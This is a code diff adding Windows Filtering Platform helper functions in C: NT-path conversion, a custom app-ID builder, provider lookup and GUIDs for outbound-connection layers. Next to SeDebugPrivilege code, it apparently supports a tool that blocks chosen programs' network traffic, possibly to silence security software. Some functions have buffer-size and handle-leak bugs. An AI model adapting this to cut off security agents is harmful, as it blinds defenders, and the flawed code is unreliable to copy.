printf("[-] LookupPrivilegeValueA failed with error code:0x%x\n", GetLastError()); printf("[-] LookupPrivilegeValueA failed with error code: 0x%x.\n", GetLastError());
CloseHandle(hToken); CloseHandle(hToken);
return FALSE; return FALSE;
} }
@@ -81,7 +81,7 @@ BOOL EnableSeDebugPrivilege() {
tokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; tokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (!AdjustTokenPrivileges(hToken, FALSE, &tokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) { if (!AdjustTokenPrivileges(hToken, FALSE, &tokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) {
printf("[-] AdjustTokenPrivileges failed with error code:0x%x\n", GetLastError()); printf("[-] AdjustTokenPrivileges failed with error code: 0x%x.\n", GetLastError());
CloseHandle(hToken); CloseHandle(hToken);
return FALSE; return FALSE;
} }
@@ -100,7 +100,138 @@ void CharArrayToWCharArray(const char charArray[], WCHAR wCharArray[], size_t wC
int result = MultiByteToWideChar(CP_UTF8, 0, charArray, -1, wCharArray, wCharArraySize); int result = MultiByteToWideChar(CP_UTF8, 0, charArray, -1, wCharArray, wCharArraySize);
if (result == 0) { if (result == 0) {
printf("[-] MultiByteToWideChar failed with error code:0x%x\n", GetLastError()); printf("[-] MultiByteToWideChar failed with error code: 0x%x.\n", GetLastError());
wCharArray[0] = L'\0'; wCharArray[0] = L'\0';
} }
} }
BOOL GetDriveName(PCWSTR filePath, wchar_t* driveName, size_t driveNameSize) {
if (!filePath) {
return FALSE;
}
const wchar_t *colon = wcschr(filePath, L':');
if (colon && (colon - filePath + 1) < driveNameSize) {
wcsncpy(driveName, filePath, colon - filePath + 1);
driveName[colon - filePath + 1] = L'\0';
return TRUE;
} else {
return FALSE;
}
}
ErrorCode ConvertToNtPath(PCWSTR filePath, wchar_t* ntPathBuffer, size_t bufferSize) {
WCHAR driveName[10];
WCHAR ntDrivePath[MAX_PATH];
if (!filePath || !ntPathBuffer) {
return CUSTOM_NULL_INPUT;
}
if (!GetDriveName(filePath, driveName, sizeof(driveName) / sizeof(WCHAR))) {
return CUSTOM_DRIVE_NAME_NOT_FOUND;
}
if (QueryDosDeviceW(driveName, ntDrivePath, sizeof(ntDrivePath) / sizeof(WCHAR)) == 0) {
return CUSTOM_FAILED_TO_GET_DOS_DEVICE_NAME;
}
swprintf(ntPathBuffer, bufferSize, L"%S%S", ntDrivePath, filePath + wcslen(driveName));
for (size_t i = 0; ntPathBuffer[i] != L'\0'; ++i) {
ntPathBuffer[i] = towlower(ntPathBuffer[i]);
}
return CUSTOM_SUCCESS;
}
BOOL FileExists(PCWSTR filePath) {
if (!filePath) {
return FALSE;
}
DWORD fileAttrib = GetFileAttributesW(filePath);
if (fileAttrib == INVALID_FILE_ATTRIBUTES) {
return FALSE;
}
return TRUE;
}
ErrorCode CustomFwpmGetAppIdFromFileName0(PCWSTR filePath, FWP_BYTE_BLOB** appId) {
if (!FileExists(filePath)) {
return CUSTOM_FILE_NOT_FOUND;
}
WCHAR ntPath[MAX_PATH];
ErrorCode errorCode = ConvertToNtPath(filePath, ntPath, sizeof(ntPath));
if (errorCode != CUSTOM_SUCCESS) {
return errorCode;
}
*appId = (FWP_BYTE_BLOB*)malloc(sizeof(FWP_BYTE_BLOB));
if (!*appId) {
return CUSTOM_MEMORY_ALLOCATION_ERROR;
}
(*appId)->size = wcslen(ntPath) * sizeof(WCHAR) + sizeof(WCHAR);
(*appId)->data = (UINT8*)malloc((*appId)->size);
if (!(*appId)->data) {
free(*appId);
return CUSTOM_MEMORY_ALLOCATION_ERROR;
}
memcpy((*appId)->data, ntPath, (*appId)->size);
return CUSTOM_SUCCESS;
}
void FreeAppId(FWP_BYTE_BLOB* appId) {
if (appId) {
if (appId->data) {
free(appId->data);
}
free(appId);
}
}
// Get provider GUID by description
BOOL GetProviderGUIDByDescription(PCWSTR providerDescription, GUID* outProviderGUID) {
DWORD result = 0;
HANDLE hEngine = NULL;
HANDLE enumHandle = NULL;
FWPM_PROVIDER0** providers = NULL;
UINT32 numProviders = 0;
result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine);
if (result != ERROR_SUCCESS) {
printf("[-] FwpmEngineOpen0 failed with error code: 0x%x.\n", result);
return FALSE;
}
result = FwpmProviderCreateEnumHandle0(hEngine, NULL, &enumHandle);
if (result != ERROR_SUCCESS) {
printf("[-] FwpmProviderCreateEnumHandle0 failed with error code: 0x%x.\n", result);
FwpmEngineClose0(hEngine);
return FALSE;
}
result = FwpmProviderEnum0(hEngine, enumHandle, 100, &providers, &numProviders);
if (result != ERROR_SUCCESS) {
printf("[-] FwpmProviderEnum0 failed with error code: 0x%x.\n", result);
FwpmEngineClose0(hEngine);
return FALSE;
}
for (UINT32 i = 0; i < numProviders; i++) {
if (providers[i]->displayData.description != NULL) {
if (wcscmp(providers[i]->displayData.description, providerDescription) == 0) {
*outProviderGUID = providers[i]->providerKey;
return TRUE;
}
}
}
if (providers) {
FwpmFreeMemory0((void**)&providers);
}
FwpmProviderDestroyEnumHandle0(hEngine, enumHandle);
FwpmEngineClose0(hEngine);
return FALSE;
}
utils.h
+43
View File
@@ -4,7 +4,50 @@
#include <stdio.h> #include <stdio.h>
#include <tlhelp32.h> #include <tlhelp32.h>
// d78e1e87-8644-4ea5-9437-d809ecefc971
DEFINE_GUID(
FWPM_CONDITION_ALE_APP_ID,
0xd78e1e87,
0x8644,
0x4ea5,
0x94, 0x37, 0xd8, 0x09, 0xec, 0xef, 0xc9, 0x71
);
// c38d57d1-05a7-4c33-904f-7fbceee60e82
DEFINE_GUID(
FWPM_LAYER_ALE_AUTH_CONNECT_V4,
0xc38d57d1,
0x05a7,
0x4c33,
0x90, 0x4f, 0x7f, 0xbc, 0xee, 0xe6, 0x0e, 0x82
);
// 4a72393b-319f-44bc-84c3-ba54dcb3b6b4
DEFINE_GUID(
FWPM_LAYER_ALE_AUTH_CONNECT_V6,
0x4a72393b,
0x319f,
0x44bc,
0x84, 0xc3, 0xba, 0x54, 0xdc, 0xb3, 0xb6, 0xb4
);
typedef enum ErrorCode {
CUSTOM_SUCCESS = 0,
CUSTOM_FILE_NOT_FOUND = 0x1,
CUSTOM_MEMORY_ALLOCATION_ERROR = 0x2,
CUSTOM_NULL_INPUT = 0x3,
CUSTOM_DRIVE_NAME_NOT_FOUND = 0x4,
CUSTOM_FAILED_TO_GET_DOS_DEVICE_NAME = 0x5,
} ErrorCode;
#define FWPM_FILTER_FLAG_PERSISTENT (0x00000001) #define FWPM_FILTER_FLAG_PERSISTENT (0x00000001)
#define FWPM_PROVIDER_FLAG_PERSISTENT (0x00000001)
BOOL CheckProcessIntegrityLevel(); BOOL CheckProcessIntegrityLevel();
BOOL EnableSeDebugPrivilege(); BOOL EnableSeDebugPrivilege();
void CharArrayToWCharArray(const char charArray[], WCHAR wCharArray[], size_t wCharArraySize); void CharArrayToWCharArray(const char charArray[], WCHAR wCharArray[], size_t wCharArraySize);
BOOL GetDriveName(PCWSTR fileName, wchar_t* driveName, size_t driveNameSize);
ErrorCode ConvertToNtPath(PCWSTR filePath, wchar_t* ntPathBuffer, size_t bufferSize);
BOOL FileExists(PCWSTR filePath);
ErrorCode CustomFwpmGetAppIdFromFileName0(PCWSTR filePath, FWP_BYTE_BLOB** appId);
void FreeAppId(FWP_BYTE_BLOB* appId);
BOOL GetProviderGUIDByDescription(PCWSTR providerDescription, GUID* outProviderGUID);